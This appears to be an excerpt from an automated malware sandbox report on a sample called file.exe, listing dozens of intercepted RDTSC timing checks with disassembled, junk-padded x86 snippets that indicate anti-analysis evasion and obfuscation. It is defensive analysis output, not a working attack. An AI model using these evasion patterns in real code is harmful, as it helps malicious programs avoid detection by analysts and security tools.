                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D828 second address: 72D832 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A7EA second address: 72A7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B875 second address: 72B87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C900 second address: 72C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D9E5 second address: 72D9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B87B second address: 72B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F7F0 second address: 72F879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F488D045409h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F488D0453F8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 movzx ebx, di 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F488D0453F8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 xchg eax, esi 0x00000048 push edi 0x00000049 jl 00007F488D045403h 0x0000004f jmp 00007F488D0453FDh 0x00000054 pop edi 0x00000055 push eax 0x00000056 js 00007F488D045400h 0x0000005c pushad 0x0000005d push edx 0x0000005e pop edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E97A second address: 72E97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E97E second address: 72E990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F488D0453F8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308B7 second address: 7308BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308BD second address: 7308CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F488D0453F6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F95B second address: 72F97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F488C756D08h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308CA second address: 7308CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7329ED second address: 7329F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73585E second address: 735864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735864 second address: 73587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756D06h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73587E second address: 735882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7389FC second address: 738A06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739C02 second address: 739C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739C07 second address: 739C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F488C756D21h 0x0000000f jmp 00007F488C756D07h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD507 second address: 6CD515 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E32E second address: 73E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DA96 second address: 73DABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F488D0453F6h 0x00000011 jmp 00007F488D045400h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74273D second address: 742741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74283F second address: 742864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F488D0453FEh 0x00000008 je 00007F488D0453F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push esi 0x00000014 jl 00007F488D0453FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742864 second address: 742872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742872 second address: 742877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742877 second address: 74287C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747DFE second address: 747E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045400h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748263 second address: 748267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748267 second address: 748285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F488D045406h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748285 second address: 748297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748715 second address: 74871B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BDA3 second address: 74BDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BDA7 second address: 74BDCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FAh 0x00000007 jmp 00007F488D045401h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8CB second address: 6DC8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8D1 second address: 6DC8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8D5 second address: 6DC8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8DF second address: 6DC920 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F488D045410h 0x00000010 jmp 00007F488D045408h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jno 00007F488D045407h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75358F second address: 753594 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536F9 second address: 753709 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F488D0453F6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753709 second address: 75373D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F488C756D06h 0x00000010 je 00007F488C756CF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753A92 second address: 753A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75419E second address: 7541A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700BDB second address: 700BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700BE4 second address: 700BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754A4B second address: 754A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F488D045403h 0x00000011 jmp 00007F488D045405h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7532AF second address: 7532C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F488C756CF6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7532C1 second address: 7532C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A8CB second address: 75A8E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D02h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A8E3 second address: 75A8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C28 second address: 759C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C2E second address: 759C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045401h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C43 second address: 759C73 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F488C756CF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F488C756D10h 0x00000016 jmp 00007F488C756D08h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C73 second address: 759C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759DF6 second address: 759DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759DFB second address: 759E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1EA second address: 75A1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1F0 second address: 75A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1FB second address: 75A205 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F488C756CF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A205 second address: 75A20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A20B second address: 75A225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756D04h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700035 second address: 700042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F488D0453FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEFE second address: 75DF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F488C756CFEh 0x0000000f jns 00007F488C756CF6h 0x00000015 popad 0x00000016 jnc 00007F488C756CF8h 0x0000001c pushad 0x0000001d je 00007F488C756CF6h 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DEC4 second address: 71DECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E1EF second address: 71E1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E1F4 second address: 71E1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E1FA second address: 56EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F488C756CFEh 0x0000000f push dword ptr [ebp+122D11A5h] 0x00000015 mov edi, dword ptr [ebp+122D20A6h] 0x0000001b push esi 0x0000001c mov dword ptr [ebp+124763D1h], edx 0x00000022 pop edx 0x00000023 call dword ptr [ebp+122D3719h] 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D2E89h], edx 0x00000030 xor eax, eax 0x00000032 jmp 00007F488C756D07h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b pushad 0x0000003c jmp 00007F488C756D03h 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D2CCEh], eax 0x00000048 pushad 0x00000049 jmp 00007F488C756D08h 0x0000004e popad 0x0000004f jns 00007F488C756CF7h 0x00000055 mov esi, 0000003Ch 0x0000005a add dword ptr [ebp+122D2E89h], edx 0x00000060 mov dword ptr [ebp+122D2E89h], eax 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D2E89h], ecx 0x00000070 cld 0x00000071 lodsw 0x00000073 cld 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jp 00007F488C756CFCh 0x0000007e mov dword ptr [ebp+122D34F3h], edx 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jnl 00007F488C756CFEh 0x0000008e push eax 0x0000008f push eax 0x00000090 push edx 0x00000091 pushad 0x00000092 jmp 00007F488C756CFEh 0x00000097 jmp 00007F488C756CFFh 0x0000009c popad 0x0000009d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E2DD second address: 71E30A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F488D045400h 0x00000015 jmp 00007F488D0453FAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E30A second address: 71E30F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E30F second address: 71E31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E31D second address: 71E321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E48A second address: 71E49F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488D045401h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E49F second address: 71E4BF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F488C756D01h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E5A5 second address: 71E5C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007F488D0453FAh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E5C4 second address: 71E5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EE88 second address: 71EE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EE9E second address: 71EEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756D05h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EEB7 second address: 71EEEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F488D0453F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnl 00007F488D04540Eh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ebx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EEEB second address: 71EF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F488C756CFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71EF06 second address: 71EF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1D9 second address: 75E1FB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F488C756D0Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1FB second address: 75E219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jmp 00007F488D045402h 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E64E second address: 75E654 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E654 second address: 75E663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F488D0453F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E8FB second address: 75E8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E8FF second address: 75E916 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F488D0453F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F488D0453FDh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA4F second address: 75EA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F488C756CF6h 0x00000009 jmp 00007F488C756D07h 0x0000000e jnl 00007F488C756CF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EB8B second address: 75EBA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F488D045402h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7699 second address: 6D769D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76456C second address: 76458F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F488D045408h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76458F second address: 7645AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F488C756D05h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7645AC second address: 7645B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
